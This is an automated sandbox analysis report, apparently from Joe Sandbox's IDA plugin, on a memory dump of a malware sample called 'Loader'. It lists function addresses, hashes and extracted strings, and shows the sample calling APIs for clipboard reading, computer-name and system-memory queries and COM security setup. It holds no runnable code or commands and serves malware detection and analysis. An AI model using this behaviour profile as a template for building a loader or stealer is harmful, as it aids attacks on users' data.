Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: DJ$,@ F$,D J$57B$>\:B$IF$HN
API String ID: 0-546559132
Opcode ID: 256cd1e2b87f342527cd7979723287081b232435937e080061f0061264ea3875
Instruction ID: 573b38de4df0c584551da9470d46ba7f63cc1349f9138d30f378e2aa21cb097c
Opcode Fuzzy Hash: 256cd1e2b87f342527cd7979723287081b232435937e080061f0061264ea3875
Instruction Fuzzy Hash: 88E1D9B560D3418FD310CF68E89126BBBE1FBC5754F14892DE9818B361E778890ACB4B

Function 00409400 Relevance: 7.9, Strings: 6, Instructions: 366
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

hi, xrefs: 004097F3
f*Dk, xrefs: 00409531
FAD730AECC011CA38246926E533C64D7, xrefs: 004094C4
QB, xrefs: 004096C7
j*Dk, xrefs: 0040957B
9Z, xrefs: 004096BF

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: 9Z$FAD730AECC011CA38246926E533C64D7$QB$f*Dk$hi$j*Dk
API String ID: 0-643466669
Opcode ID: b730e9b78eb2bf3f614c61d1bfed981cc9b54103566f3d92fdc9fb82601dc528
Instruction ID: f303c378167b457a4bc42ceebe78ce79b7bb772c8b3d846b3dc4aa0fafa8ed13
Opcode Fuzzy Hash: b730e9b78eb2bf3f614c61d1bfed981cc9b54103566f3d92fdc9fb82601dc528
Instruction Fuzzy Hash: 85B1227161C3808BD718DF65C8516ABBBE2EBD2304F14892DE0E59B392D73CD50ACB5A

Function 0042C98C Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 607
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042CDAC

Strings

b, xrefs: 0042CDC4
YcZ`, xrefs: 0042CF1B
@[/S, xrefs: 0042CE44

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: @[/S$YcZ`$b
API String ID: 3960555810-168354034
Opcode ID: 3b8701f6d285188c90c39da254eef539b97e416a32c7c175b415e0f0a5f096d4
Instruction ID: b2947f96fe340a9df3130b14c84d258fde6853037fb12cce7bd63350d2db69b3
Opcode Fuzzy Hash: 3b8701f6d285188c90c39da254eef539b97e416a32c7c175b415e0f0a5f096d4
Instruction Fuzzy Hash: 39F1247060C3D18BD729CF29A4A036FFFE1AF96304F18496EE0DA87392D77985058B56

Function 00417745 Relevance: 1.8, APIs: 1, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cc985996d123b44c06bdbe62607eeac046dd191f9733dc24fca1af59f0d703a
Instruction ID: b8f4197d2f7c9f56fe9597a4586bb863907c9934a7ce81ce2e300af997d9591d
Opcode Fuzzy Hash: 6cc985996d123b44c06bdbe62607eeac046dd191f9733dc24fca1af59f0d703a
Instruction Fuzzy Hash: 398117B190C2018FC714DF28C8916ABB7F1AF95304F18492EE4D987392E738E945CB9B

Function 00440770 Relevance: 1.5, Strings: 1, Instructions: 297COMMON

Download Yara Rule

Strings

TUVW, xrefs: 004407F8, 004408C2

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID: TUVW
API String ID: 2994545307-380802359
Opcode ID: 5a35a9d452afbc38b6c475497b936c0f9f51ddbb7844b1b6c0d36c5b06337292
Instruction ID: 7047d3b5c699d964b661b5aab337125677ab7b56ce49f2f3292149c0b4397d23
Opcode Fuzzy Hash: 5a35a9d452afbc38b6c475497b936c0f9f51ddbb7844b1b6c0d36c5b06337292
Instruction Fuzzy Hash: 659165717083019FE325DF68D880A2BB7E2EBD6310F18893DE69597391C639DC16CB96

Function 0043DA10 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00440D9D,?,00000018,?,?,00000018,?,?,?), ref: 0043DA3E

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0040D11B Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

FAD730AECC011CA38246926E533C64D7, xrefs: 0040D240

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: FAD730AECC011CA38246926E533C64D7
API String ID: 0-2908244417
Opcode ID: 9e7cc8c59f2c18173cea31accb2a176d643aef917dc6008e0370f2a834755b9a
Instruction ID: b8d103c4c60b49fbe0ba22ba74ead3f046f8f308e92d5c9b0b08579b41597fc8
Opcode Fuzzy Hash: 9e7cc8c59f2c18173cea31accb2a176d643aef917dc6008e0370f2a834755b9a
Instruction Fuzzy Hash: 8C51BC72B407004BDB184F79CC52377B6A3AFE6321F1D967DD0969B7D6E63898028308

Function 0042D0CD Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: af5b5c8d97ad725f1cba710caa06336f5d4c090d00e4ccb21e8133b60b871a38
Instruction ID: c62614d48869f4b7cb033b57bff67ce6e552f370dc62dc9228bf6d030800f41c
Opcode Fuzzy Hash: af5b5c8d97ad725f1cba710caa06336f5d4c090d00e4ccb21e8133b60b871a38
Instruction Fuzzy Hash: 28412435B083514BD328CA3C9C6137BBBE2DBD6311F688A6DE5D1C7799E639C8018709

Function 0043D4E1 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a2e344c5d1edb06f7df8b2f1768e3dea44206ea03c0c1cb075caf44c4f91fa1
Instruction ID: dc484de900702ea7fd58ce72979cff842d7c41974bd76ae8d50f3999e681b5d9
Opcode Fuzzy Hash: 7a2e344c5d1edb06f7df8b2f1768e3dea44206ea03c0c1cb075caf44c4f91fa1
Instruction Fuzzy Hash: AA01DE75A80B108BD7298F24DD6136A77E0EB07304F14806EC592A7780DA7AFD008F99

Function 004336A0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 004336E2
GetSystemMetrics.USER32 ref: 004336F2

Strings

1, xrefs: 004337D2
*?C, xrefs: 00433882
LGC, xrefs: 00433790
zBC, xrefs: 00433840
AC, xrefs: 004338AE
uDC, xrefs: 004337FE
=C, xrefs: 0043379B

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: MetricsSystem
String ID: AC$*?C$1$LGC$uDC$zBC$=C
API String ID: 4116985748-682157884
Opcode ID: 02bb96d70cd6577b4178e4b39174d52ca7c32edb2cda6836f488a2f11afff723
Instruction ID: 1998a03cc5df2a2f33f1525dd043022f22112b898c887f3cf15ef20427d46a93
Opcode Fuzzy Hash: 02bb96d70cd6577b4178e4b39174d52ca7c32edb2cda6836f488a2f11afff723
Instruction Fuzzy Hash: 979149B011A384CBE774EF11C5597CFBAE1AB82308F11891ED29D4B250DBBA450DDF9A

Function 004085B0 Relevance: 7.6, APIs: 5, Instructions: 87
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004085D1
GetCurrentThreadId.KERNEL32 ref: 004085D7
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004085E8
GetForegroundWindow.USER32 ref: 0040869C
ExitProcess.KERNEL32 ref: 004086DB

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 749443de202a5043038cf60a811374f411e20320b39cfc084a8cc678c959233e
Instruction ID: 509b8593f85bca22239e70e965a689bc814e36a94043752a13a9102ecda549f4
Opcode Fuzzy Hash: 749443de202a5043038cf60a811374f411e20320b39cfc084a8cc678c959233e
Instruction Fuzzy Hash: BF2168B1E002005BD7147F319D0A72A76959F86705F0A863EECD5BB3E7EE3D8811865E

Function 0042BF32 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042BFEB

Strings

Jk, xrefs: 0042BF7F

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: ComputerName
String ID: Jk
API String ID: 3545744682-2435780000
Opcode ID: e11f0280e5fc73940bd43accc5bac76100360abbb9ea086e8515174c2a2be390
Instruction ID: f8b6963ffdad34389f8e41c28869e3d9660b03a655e2583e95d8d3bda7f56e74
Opcode Fuzzy Hash: e11f0280e5fc73940bd43accc5bac76100360abbb9ea086e8515174c2a2be390
Instruction Fuzzy Hash: 9221253550C7904ADB32CB3998647EBBBE09F97304F094A6DC4DDC7286DB384405CB96

Function 0042BF30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042BFEB

Strings

Jk, xrefs: 0042BF7F

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: ComputerName
String ID: Jk
API String ID: 3545744682-2435780000
Opcode ID: 7025246bb4045d934add9299956edf933fbae908dc2bfb3c0eeb9ab801584232
Instruction ID: 1eb15b467228e91927b88c1530aa4184b94cdc4fa3224a7153598cd3ef29f343
Opcode Fuzzy Hash: 7025246bb4045d934add9299956edf933fbae908dc2bfb3c0eeb9ab801584232
Instruction Fuzzy Hash: 85113036608B904BDB31CB389C287EBBBD09F96310F194B2DC4DDC7295EB3848018B92

Function 00436A38 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00436A65

Strings

u, xrefs: 00436A73

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: DefaultLanguageUser
String ID: u
API String ID: 95929093-4067256894
Opcode ID: 3484c23c7cdde163382f8b5677bb3c5e64803b511a88fc23218b33cef870498d
Instruction ID: f3c22d90c568ecaed0f3cc6f16dafd322a7d18ae38fc015f3be8ab71a63a4f26
Opcode Fuzzy Hash: 3484c23c7cdde163382f8b5677bb3c5e64803b511a88fc23218b33cef870498d
Instruction Fuzzy Hash: 29010434C082929FCF119F78C9403EE7FA16F1B310F1986A9C4D567386D7398A058B96

Function 0040CAD6 Relevance: 3.1, APIs: 2, Instructions: 120COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040CADA
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CC22

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 473d84c0bd29ceff853ded9ea3310dfdb5f52dcc193ba7537c9131df9544d089
Instruction ID: a48d5ef0adb5250571e8a41bd9df73004e022a6934e4612084ba1943594d6038
Opcode Fuzzy Hash: 473d84c0bd29ceff853ded9ea3310dfdb5f52dcc193ba7537c9131df9544d089
Instruction Fuzzy Hash: A741E4B4D10B00AFD370EF39DA4B7127EB4AB05250F404B2DF9EA866D4E631A4198BD7

Function 0042BDF4 Relevance: 3.1, APIs: 2, Instructions: 99COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0042BE25
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042BEC6

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: 1b899856a03afd29ed7c8782b2defd5225d8016c3f33a9f86d38d8b93064c668
Instruction ID: 4b0124f1363a5f6538044442258c4939d1b124f166065c956affb4ec42b5f0b7
Opcode Fuzzy Hash: 1b899856a03afd29ed7c8782b2defd5225d8016c3f33a9f86d38d8b93064c668
Instruction Fuzzy Hash: 7731F53522C3918FD7218B35D8107EBBBE5AF9A314F99486EC1C8D7252DB788806C791

Function 0042BDEE Relevance: 3.1, APIs: 2, Instructions: 84COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0042BE25
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042BEC6

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID:
API String ID: 2904949787-0
Opcode ID: 6620cd2dd9454d8305604dc0a295b7f92df86d05da90940a768b1fd21d37aead
Instruction ID: b0442a1b6006627bfac749667bf69648ea68c72265edfd0c76de215cb43adc1f
Opcode Fuzzy Hash: 6620cd2dd9454d8305604dc0a295b7f92df86d05da90940a768b1fd21d37aead
Instruction Fuzzy Hash: 6A21F8352683918FD721DB35DC107EBBBE6EB9A314F99492ED1C9C7252DB7488028781

Function 0043E9A1 Relevance: 3.0, APIs: 2, Instructions: 16COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043E9A1
GetForegroundWindow.USER32 ref: 0043E9B3

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 0dea34fee18d2d4d34ccc8698138f7830839b94345d1193dcb1cea91282bf9ce
Instruction ID: 1f1a92c4ed7c3cabed4fabd3d678f137bf463a9ca5e289bc5fa2f09bb69a997d
Opcode Fuzzy Hash: 0dea34fee18d2d4d34ccc8698138f7830839b94345d1193dcb1cea91282bf9ce
Instruction Fuzzy Hash: B7D012B9C000068BDF44DFA0FC8D44E7769BE46619F045035E40343122E93495068B4D

Function 0042BD74 Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042BEC6

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: cd2bccd2bec2de7f05dfec0e84612135ab30a4b4d834837766c462715e607512
Instruction ID: 2ec592fbdc78758a6a3c226a3e8484dbb67dbcc7126bdc08d1755178837746e5
Opcode Fuzzy Hash: cd2bccd2bec2de7f05dfec0e84612135ab30a4b4d834837766c462715e607512
Instruction Fuzzy Hash: 472129352283918FD720DB35DC107EBBBE5EB9A324F994C2EC1C8C7252DB7488028781

Function 0043D990 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,00439407,02BD73B0,00000000,02BD73B0,00439407,00000000,00004000,?,?,?,?,00000001,02BD73B0,000001EB), ref: 0043D9C2

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 084470b7baac391b38589efddef063322e1089dcf71c2679d93c93680cd862d0
Instruction ID: b8b631638b18798679597f3341c455e23d05a83346a63bcdeeebd9bf56da5e38
Opcode Fuzzy Hash: 084470b7baac391b38589efddef063322e1089dcf71c2679d93c93680cd862d0
Instruction Fuzzy Hash: EFF0277A8582A0FBC6116F25BC02A9B3664EF8F315F01147BF401A6121DB3ADC06D6DF

Function 00432919 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00432965

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: e533b8d7a54d8a619334615e694dd05766154279aca62bc1f98a219380d37df7
Instruction ID: 24518978adee5ca75fa83efdf11994bb0dab04cffabc163f3a89706635ba24a8
Opcode Fuzzy Hash: e533b8d7a54d8a619334615e694dd05766154279aca62bc1f98a219380d37df7
Instruction Fuzzy Hash: 92F0A4B45093518FE321DF25D56974FBBE4BB88348F11891CE8945B291C7B99A488FC2

Function 0042E1EE Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042E237

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: f6c407c80fc0f7406bccacefba9cb4fe8356fce67e48fbcb250bc6c4a1960068
Instruction ID: a6a0066e54c7d049ab9ba52ee2f517c0d060c6457a62882aa2ba7396dcee3bc7
Opcode Fuzzy Hash: f6c407c80fc0f7406bccacefba9cb4fe8356fce67e48fbcb250bc6c4a1960068
Instruction Fuzzy Hash: 2CF07AB45087018FD354DF25D5A875BBBE0FB85304F00881DE5D68B290DBB59A48CF86

Function 0040CC67 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CC79

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: f26f7e794f68f0bb5a99fe30ccc7342a53b7d5a4afcd2a31ad992c16831d56de
Instruction ID: 2b78fd6e66c85e2770e1fedaeca4d467f1847f566c0c49e5f6124588b814a6a2
Opcode Fuzzy Hash: f26f7e794f68f0bb5a99fe30ccc7342a53b7d5a4afcd2a31ad992c16831d56de
Instruction Fuzzy Hash: C6D092353D83417BF9645B08AD53F1072509746F16F310624B323FE2E5C9906501860C

Function 0043BD40 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,00000000,004146B4,00000000), ref: 0043BD60

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 8b36816211867e107b1c33e8a36d1a93761f9aace37de06867b51b3c08574d90
Instruction ID: f90848bae3256b06cf5094926935a10db3a74c04a44cfe7e493f6f0e12b6a334
Opcode Fuzzy Hash: 8b36816211867e107b1c33e8a36d1a93761f9aace37de06867b51b3c08574d90
Instruction Fuzzy Hash: 85D0C931465622EBC6146F18BC15BC73A54DF4A361F0708A2F4006A475C675DC91DAE8

Function 0043BD20 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,00408638,?,00408638), ref: 0043BD30

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cf65f95657680e7bc98513e43210a7ecff9104acca7fedf48e906d763921924d
Instruction ID: 2c7a29268eac836babc22c216ba9330a039660881ad4ae188c8b4a1fbc13fc40
Opcode Fuzzy Hash: cf65f95657680e7bc98513e43210a7ecff9104acca7fedf48e906d763921924d
Instruction Fuzzy Hash: 40C09B31455321EBC6106B15FC05FC77F54DF49751F1140A6B00477072C771AC41C6D8

Non-executed Functions

Function 00433500 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 121clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00433514
GetClipboardData.USER32 ref: 0043352F
GlobalLock.KERNEL32 ref: 00433548
GetWindowLongW.USER32 ref: 004335AE
GlobalUnlock.KERNEL32 ref: 00433681
CloseClipboard.USER32 ref: 0043368A

Strings

Q, xrefs: 004335EC
x, xrefs: 004335D3
q, xrefs: 004335C9
j, xrefs: 004335E7
e, xrefs: 004335DD
], xrefs: 004335BF

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: Q$]$e$j$q$x
API String ID: 2832541153-692368135
Opcode ID: cd7ee1b0d44008d18f148219d93ad27284650de1e218d48dcbd18ce31904f4f5
Instruction ID: 6f1dbd0e63c0454490a30a8cba9f540b8e981e08c188719af7d206ff943662a7
Opcode Fuzzy Hash: cd7ee1b0d44008d18f148219d93ad27284650de1e218d48dcbd18ce31904f4f5
Instruction Fuzzy Hash: 9B41927150C7418ED310AF78988935FBFE0AB9A315F044A3EE4D5873D2D6788649C75B

Function 00426FD0 Relevance: 16.1, APIs: 2, Strings: 7, Instructions: 306COMMON

Download Yara Rule

Strings

KJIH, xrefs: 00427214
1G#A, xrefs: 0042727E
xlc=, xrefs: 00427190
rqB, xrefs: 00427165
#C(], xrefs: 00427286
o;i, xrefs: 004272AE
3SQm, xrefs: 004272A6

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: o;i$#C(]$1G#A$3SQm$KJIH$rqB$xlc=
API String ID: 0-4225912290
Opcode ID: b291a350f7d21ee5a1b80931a86ef7cb954b4aa59bf97fddcf800b527b295b08
Instruction ID: 99384cb80079416eac910717a9e1d0dd8795ebf962f0defd3915704c1b902f09
Opcode Fuzzy Hash: b291a350f7d21ee5a1b80931a86ef7cb954b4aa59bf97fddcf800b527b295b08
Instruction Fuzzy Hash: 06914876A0C3248BC320DF64E88165FB7E1EBC9704F59493EE98997341DB74AD058BCA

Function 00419190 Relevance: 11.7, APIs: 2, Strings: 4, Instructions: 1209COMMON

Download Yara Rule

APIs

Part of subcall function 0043DA10: LdrInitializeThunk.NTDLL(00440D9D,?,00000018,?,?,00000018,?,?,?), ref: 0043DA3E

FreeLibrary.KERNEL32(?), ref: 00419706
FreeLibrary.KERNEL32(?), ref: 0041976B

Strings

X{, xrefs: 004195AE
056w, xrefs: 004198C4
HS, xrefs: 004195B6
wB, xrefs: 004195C6

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: 056w$HS$X{$wB
API String ID: 764372645-2637307891
Opcode ID: a444461b27d80ad657000d898751c9d626c695014427ae98d874af7b6ceb9ac3
Instruction ID: 5228fd0e467c720768e27c90b66e3c9c54d982958b1791ede40bd78fdaf92bff
Opcode Fuzzy Hash: a444461b27d80ad657000d898751c9d626c695014427ae98d874af7b6ceb9ac3
Instruction Fuzzy Hash: B0821B746483406BE724CF24D8A076BBBE1EBD6714F28892DE0D5473A1D379DC82CB5A

Function 00418241 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 419COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00418272

Strings

o, xrefs: 0041898B
L, xrefs: 0041836B
<9, xrefs: 0041835B

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: <9$L$o
API String ID: 237503144-3122339205
Opcode ID: f91f0f8c20f7ac1f881b57f9819e89f26c0b09be35d7c1beb1e8172666532097
Instruction ID: 38d06cfc946e2d634f33bc898b8b3081b8a665a97a1976fa3bc9cb3ab81d6238
Opcode Fuzzy Hash: f91f0f8c20f7ac1f881b57f9819e89f26c0b09be35d7c1beb1e8172666532097
Instruction Fuzzy Hash: F6E14B756083528BD320CF29D8D07ABB7E1EF99324F188A3DE4C487391EB789945CB56

Function 00417EEE Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 287COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,59195F3A,00000000,00000000,?), ref: 004181F4

Strings

!C-M, xrefs: 004180FA
M+O, xrefs: 00417F5E
}Y*[, xrefs: 00417FC2
7imJ, xrefs: 00417F7B
qWs, xrefs: 00417F66

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: M+O$!C-M$7imJ$}Y*[$qWs
API String ID: 237503144-2509796657
Opcode ID: 47ed97315e110507114ef7b549b792d0a16ca60f33f0bbd43ba62459c0688936
Instruction ID: 249fc3654da106cc027156d5fad6694f65c71858bdaf82a4f9d6bcb215be2f5f
Opcode Fuzzy Hash: 47ed97315e110507114ef7b549b792d0a16ca60f33f0bbd43ba62459c0688936
Instruction Fuzzy Hash: 3F9116716183128BC324CF14C4916BBB7F1EFC9764F199A1EE5CA5B361E7389881C74A

